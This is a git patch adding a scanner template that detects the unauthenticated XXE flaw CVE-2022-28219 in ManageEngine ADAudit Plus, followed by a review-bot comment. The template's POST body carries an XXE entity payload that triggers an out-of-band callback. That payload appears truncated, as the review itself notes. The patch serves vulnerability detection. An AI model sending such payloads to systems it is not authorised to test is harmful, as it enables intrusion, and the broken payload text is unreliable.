From b2a386d63699d4bb6a02c4ff6d4c7a8cf0c08de2 Mon Sep 17 00:00:00 2001
From: Dwi Siswanto
Date: Thu, 30 Jun 2022 12:41:59 +0700
Subject: [PATCH] Add CVE-2022-28219 (#4705)
---
 cves/2022/CVE-2022-28219.yaml | 42 +++++++++++++++++++++++++++++++++++
 1 file changed, 42 insertions(+)
 create mode 100644 cves/2022/CVE-2022-28219.yaml
diff --git a/cves/2022/CVE-2022-28219.yaml b/cves/2022/CVE-2022-28219.yaml
new file mode 100644
index 0000000000..7af370ce26
--- /dev/null
+++ b/cves/2022/CVE-2022-28219.yaml
@@ -0,0 +1,42 @@
+id: CVE-2022-28219
+
+info:
+ name: Unauthenticated XXE to RCE in Zoho ManageEngine ADAudit Plus
+ author: dwisiswant0
+ severity: critical
+ description: |
+ Zoho ManageEngine ADAudit Plus before 7060 is vulnerable to an
+ unauthenticated XXE attack that leads to Remote Code Execution.
+ This template supports the detection part only, to achieve an
+ XXE to RCE, see reference[2].
+ reference:
+ - https://www.manageengine.com/products/active-directory-audit/cve-2022-28219.html
+ - https://www.horizon3.ai/red-team-blog-cve-2022-28219/
+ remediation: |
+ Update to ADAudit Plus build 7060 or later, and ensure ADAudit Plus
+ is configured with a dedicated service account with restricted privileges.
+ tags: cve,cve2022,xxe,rce,zoho,manageengine
+
+requests:
+ - method: POST
+ path:
+ - "{{BaseURL}}/api/agent/tabs/agentData"
+ headers:
+ Content-Type: application/json
+ body: |
+ [
+ {
+ "DomainName": "{{Host}}",
+ "EventCode": 4688,
+ "EventType": 0,
+ "TimeGenerated": 0,
+ "Task Content": " %xxe; ]>"
+ }
+ ]
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: interactsh_protocol # Confirms the HTTP Interaction
+ words:
+ - "http"
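Review bot: The `info` block carries no `classification` stanza, so the CVE id and weakness class live only in free text, whereas downstream consumers of these templates typically filter on the structured fields; I'd add `classification:` with `cve-id: CVE-2022-28219` and `cwe-id: CWE-611` (the XXE weakness class), with `cvss-metrics`/`cvss-score` copied from the vendor advisory already listed under `reference`. The `Task Content` value as rendered here begins at `%xxe;` with no preceding entity declaration, which looks like an extraction artifact rather than the committed text; if the blob at `7af370ce26` really lacks it, the `interactsh_protocol` matcher can never fire and the template silently reports nothing, so it is worth confirming against the file itself. The phrase `see reference[2]` in the description is ambiguous between 0- and 1-based indexing with only two entries listed; naming the intended entry as `the horizon3.ai write-up` removes the guess. Since the only positive signal is an out-of-band HTTP callback, a short comment above `matchers:` such as `# A hit proves the server resolved an external entity; no in-band response check is possible here` would help maintainers understand why there is no status or body matcher.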